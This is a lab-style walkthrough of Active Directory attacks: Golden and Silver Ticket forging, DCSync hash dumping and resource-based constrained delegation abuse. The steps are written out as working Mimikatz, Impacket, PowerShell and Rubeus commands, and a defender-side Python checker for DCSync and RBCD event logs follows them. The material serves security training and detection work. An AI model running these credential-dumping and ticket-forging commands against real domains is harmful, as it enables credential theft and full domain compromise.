Active Directory Attack Lab Walkthrough – Part 2: Golden Tickets, Silver Tickets, DCSync, and RBCD
This guide builds on Part 1 and walks you through more advanced, high-impact techniques in Active Directory exploitation. These are techniques used to maintain persistence, move laterally with stealth, and access sensitive data without triggering typical defenses.
Golden Ticket Attack
Goal: Forge a TGT (Ticket Granting Ticket) to impersonate any user in the domain, including domain admins.
What You Need:
- The NTLM hash of the krbtgt account (can be dumped via Mimikatz or DCSync)
- The domain name
- The SID of the domain
Steps:
- Dump the krbtgt hash:
lsadump::lsa /inject /name:krbtgt
- Build a golden ticket with Mimikatz:
kerberos::golden /user:Administrator /domain:security.local /sid:S-1-5-21-XXXX /krbtgt:<krbtgt_hash> /id:500 /ptt
- Confirm ticket injection:
kerberos::list
- Use the ticket to access privileged resources:
dir \\dc.security.local\C$
Silver Ticket Attack
Goal: Forge a TGS (Ticket Granting Service ticket, i.e. a service ticket) to access a specific service on a specific machine without contacting the DC.
What You Need:
- The NTLM hash of the service account
- SPN for the service
- FQDN and hostname of the target server
Steps:
- Get SPNs for service accounts:
Get-DomainUser -SPN
- Use Mimikatz to create a silver ticket:
kerberos::golden /user:svc-account /domain:security.local /sid:S-1-5-21-XXXX /rc4:<NTLM_hash> /service:cifs /target:server.security.local /ptt
- Verify ticket:
kerberos::list
- Use the ticket to access the service:
dir \\server.security.local\C$
DCSync Attack
Goal: Simulate domain replication to dump password hashes for any user in the domain.
What You Need:
- Membership in a group with replication rights (Domain Admin, Enterprise Admin, or equivalent ACL rights)
Steps (Mimikatz):
lsadump::dcsync /domain:security.local /user:krbtgt
lsadump::dcsync /domain:security.local /user:Administrator
Steps (Impacket secretsdump):
secretsdump.py SECURITY.LOCAL/Administrator:'Password'@dc.security.local
Resource-Based Constrained Delegation (RBCD)
Goal: Configure a computer account to impersonate users to a service (e.g., domain controller) by abusing delegation settings.
What You Need:
- Low-privileged access
- The ability to create or control a computer account (AddComputer.py or similar)
- GenericWrite or WriteOwner rights over the target machine account
Steps:
- Add a new computer account:
python3 addcomputer.py -dc-ip 10.0.0.1 -computer-name CLIENT01$ -computer-pass 'Password123!' -domain security.local -u user -p userpass
- Set RBCD permissions using Set-ADComputer or Powermad:
Set-ADComputer -Identity TARGETSERVER$ -PrincipalsAllowedToDelegateToAccount CLIENT01$
- Request an impersonation ticket from the DC with S4U2Self + S4U2Proxy:
Rubeus.exe s4u /user:CLIENT01$ /rc4:<ntlm_hash> /impersonateuser:Administrator /msdsspn:cifs/dc.security.local /domain:security.local /ptt
- Use the ticket:
dir \\dc.security.local\C$
Each of these techniques allows for stealthy lateral movement or full domain compromise, often without triggering typical alerts. They are essential skills for advanced Active Directory exploitation.
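A defender-side example, added here and not part of the original lab: a small Python checker over constructed, flattened security events that flags the DCSync and RBCD steps above (Event 4662 carrying the replication extended-right GUIDs from a non-DC principal, and Event 5136 writes to msDS-AllowedToActOnBehalfOfOtherIdentity). The "Key=Value;" event format and the DC01$ account are assumptions.

```python
# Added example (not from the original lab): flag DCSync-style replication requests
# (Event 4662 carrying replication extended-right GUIDs from a non-DC account) and
# writes to the RBCD attribute (Event 5136). The event format below is constructed.
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
RBCD_ATTR = "msds-allowedtoactonbehalfofotheridentity"
DC_ACCOUNTS = {"DC01$"}  # assumption: machine accounts of the legitimate domain controllers

def parse_event(line):
    """Parse one flattened 'Key=Value;Key=Value' event line into a dict."""
    return dict(kv.split("=", 1) for kv in line.strip().split(";") if "=" in kv)

def analyze(events, dc_accounts):
    """Return alert strings for suspicious replication requests and RBCD attribute writes."""
    alerts = []
    for ev in map(parse_event, events):
        who = ev.get("SubjectUserName", "")
        if ev.get("EventID") == "4662":
            props = ev.get("Properties", "").lower()
            hits = [name for guid, name in REPL_GUIDS.items() if guid in props]
            # DCs replicate with each other; any other principal exercising these rights is suspect.
            if hits and who.upper() not in dc_accounts:
                alerts.append(f"DCSync-like replication by {who}: {', '.join(hits)}")
        elif ev.get("EventID") == "5136":
            if ev.get("AttributeLDAPDisplayName", "").lower() == RBCD_ATTR:
                alerts.append(f"RBCD attribute written on {ev.get('ObjectDN')} by {who}")
    return alerts

# Constructed sample events: legitimate DC-to-DC replication, a DCSync by a user,
# an RBCD write on TARGETSERVER$, and an unrelated attribute change.
SAMPLE_EVENTS = [
    "EventID=4662;SubjectUserName=DC01$;Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662;SubjectUserName=jdoe;Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=5136;SubjectUserName=user;ObjectDN=CN=TARGETSERVER,CN=Computers,DC=security,DC=local;AttributeLDAPDisplayName=msDS-AllowedToActOnBehalfOfOtherIdentity",
    "EventID=5136;SubjectUserName=helpdesk;ObjectDN=CN=WS01,CN=Computers,DC=security,DC=local;AttributeLDAPDisplayName=description",
]

def run_sample():
    """Run the checker over the constructed events; returns two alerts."""
    return analyze(SAMPLE_EVENTS, DC_ACCOUNTS)

if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

Baselining the DC account set and the 5136 auditing SACL on computer objects is what makes these two rules low-noise in practice.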
